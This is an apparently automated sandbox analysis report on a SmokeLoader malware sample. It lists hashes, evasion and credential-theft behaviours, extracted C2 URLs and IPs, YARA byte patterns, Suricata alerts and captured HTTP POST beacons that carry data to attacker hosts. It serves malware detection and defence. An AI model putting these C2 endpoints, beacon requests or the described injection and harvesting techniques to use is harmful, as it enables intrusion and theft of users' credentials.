Windows Analysis Report
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe

Overview

General Information

Sample name: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
Analysis ID: 1527171
MD5: 8e177d78ae583957804b5a933d6a3f1e
SHA1: edb0a9379263c6a0a12dd77df7d2abe373a24722
SHA256: 4793c4f1d490d454d761f7947b6451c07fbbc8639013f5c80b3f493e7c6cb6eb
Tags: base64-decoded, exe, user-abuse_ch

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file has a writeable .text section
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe (PID: 3340 cmdline: "C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe" MD5: 8E177D78AE583957804B5A933D6A3F1E)
    • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1868 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 2500 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 2976 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 7064 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6984 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • hfetwhc (PID: 3504 cmdline: C:\Users\user\AppData\Roaming\hfetwhc MD5: 8E177D78AE583957804B5A933D6A3F1E)
  • hfetwhc (PID: 1504 cmdline: C:\Users\user\AppData\Roaming\hfetwhc MD5: 8E177D78AE583957804B5A933D6A3F1E)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Extracted malware configuration: {"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}
Source | Rule | Description | Author | Strings
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\hfetwhc | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Source | Rule | Description | Author | Strings
0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security
00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
(7 further entries not shown)

Source | Rule | Description | Author | Strings
4.0.hfetwhc.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
16.0.hfetwhc.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
16.2.hfetwhc.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
(1 further entry not shown)

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\hfetwhc, CommandLine: C:\Users\user\AppData\Roaming\hfetwhc, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hfetwhc, NewProcessName: C:\Users\user\AppData\Roaming\hfetwhc, OriginalFileName: C:\Users\user\AppData\Roaming\hfetwhc, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\hfetwhc, ProcessId: 3504, ProcessName: hfetwhc
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-06T21:26:02.042526+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49742 | 198.54.117.242 | 80 | TCP
2024-10-06T21:26:02.042526+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49730 | 194.87.189.87 | 80 | TCP
2024-10-06T21:26:02.042526+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49738 | 194.87.189.87 | 80 | TCP
2024-10-06T21:26:02.042526+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 194.87.189.87 | 80 | TCP
2024-10-06T21:26:02.042526+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 198.54.117.242 | 80 | TCP
2024-10-06T21:26:02.042526+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49747 | 194.87.189.87 | 80 | TCP
2024-10-06T21:27:36.683173+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49734 | 198.54.117.242 | 80 | TCP
2024-10-06T21:27:37.689520+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49746 | 194.87.189.87 | 80 | TCP
2024-10-06T21:28:16.092832+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49748 | 194.87.189.87 | 80 | TCP
2024-10-06T21:28:56.074082+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49749 | 194.87.189.87 | 80 | TCP
2024-10-06T21:29:11.964748+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49750 | 194.87.189.87 | 80 | TCP
2024-10-06T21:29:30.230373+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49751 | 194.87.189.87 | 80 | TCP
2024-10-06T21:29:49.168031+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49752 | 194.87.189.87 | 80 | TCP
2024-10-06T21:30:06.043036+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.8 | 49753 | 194.87.189.87 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-06T21:27:37.879552+0200 | 2829848 | 2 | Potentially Bad Traffic | 194.87.189.87 | 80 | 192.168.2.8 | 49746 | TCP


AV Detection

Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Avira: detected
Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}
Source: C:\Users\user\AppData\Roaming\hfetwhc | ReversingLabs: Detection: 47%
Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,7_2_007E3098
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,7_2_007E3717
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E3E04 RtlCompareMemory,CryptUnprotectData,7_2_007E3E04
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,7_2_007E11E1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E1198 CryptBinaryToStringA,CryptBinaryToStringA,7_2_007E1198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,7_2_007E123B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E1FCE CryptUnprotectData,RtlMoveMemory,7_2_007E1FCE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0322178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,9_2_0322178C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0322118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,9_2_0322118D
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_03002404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,11_2_03002404
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_0300245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,11_2_0300245E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_0300263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,11_2_0300263E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C1221 CryptBinaryToStringA,CryptBinaryToStringA,13_2_030C1221
Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txt
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt
Source: Binary string: WalletProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: walletservice.pdbGCTL source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WalletProxy.pdb source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: xy.pdb source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WalletBackgroundServiceProxy.pdb source: explorer.exe, 0000000D.00000003.2700964728.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
Source: Binary string: WalletBackgroundServiceProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
Source: Binary string: xy.pdbGCT.r source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: walletservice.pdb source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: xy.pdbGCT.orp source: explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,7_2_007E2B15
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,7_2_007E1D4A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,7_2_007E3ED9
Source: C:\Windows\explorer.exe | Code function: 8_2_00A330A8 FindFirstFileW,FindNextFileW,FindClose,8_2_00A330A8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,9_2_032215BE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,9_2_032213FE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,9_2_032214D8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C2240 FindFirstFileW,FindNextFileW,FindClose,13_2_030C2240
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C18E0 lstrcatW,lstrcatW,PathCombineW,lstrcatW,PathRemoveFileSpecW,FindFirstFileExW,lstrcmpiW,PathCombineW,PathCombineW,FindNextFileW,FindClose,13_2_030C18E0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C20C1 FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,13_2_030C20C1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C1A96 GetTempPathW,GetTempFileNameW,DeleteFileW,PathRemoveExtensionW,StrRChrW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,StrStrIW,SHGetFolderPathW,PathFindFileNameW,PathAppendW,ExpandEnvironmentStringsW,13_2_030C1A96
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Networking

Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49746 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49734 -> 198.54.117.242:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49748 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49752 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49749 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49753 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49751 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49750 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49742 -> 198.54.117.242:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49730 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49738 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49714 -> 194.87.189.87:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49718 -> 198.54.117.242:80
Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49747 -> 194.87.189.87:80
Source: Malware configuration extractor | URLs: http://quantumqube.org/index.php
Source: Malware configuration extractor | URLs: https://quantumqube.org/index.php
Source: Malware configuration extractor | URLs: http://innovixus.org/index.php
Source: Malware configuration extractor | URLs: https://innovixus.org/index.php
Source: Joe Sandbox View | IP Address: 198.54.117.242 198.54.117.242
Source: Joe Sandbox View | ASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 194.87.189.87:80 -> 192.168.2.8:49746
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://upgyyhdoyghspm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 111 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://smuegklsriebfq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 233 | Host: innovixus.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://drfkgcucoqvlrnnc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 257 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://thbqljycmivxnpmr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: innovixus.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rdycpqjqlugnms.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 114 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://crwqlqtuysbj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 172 | Host: innovixus.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qlijxlatgdyt.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 168 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://quantumqube.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 501 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://quantumqube.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 6348785 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wqvfywivxptqmt.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: quantumqube.org
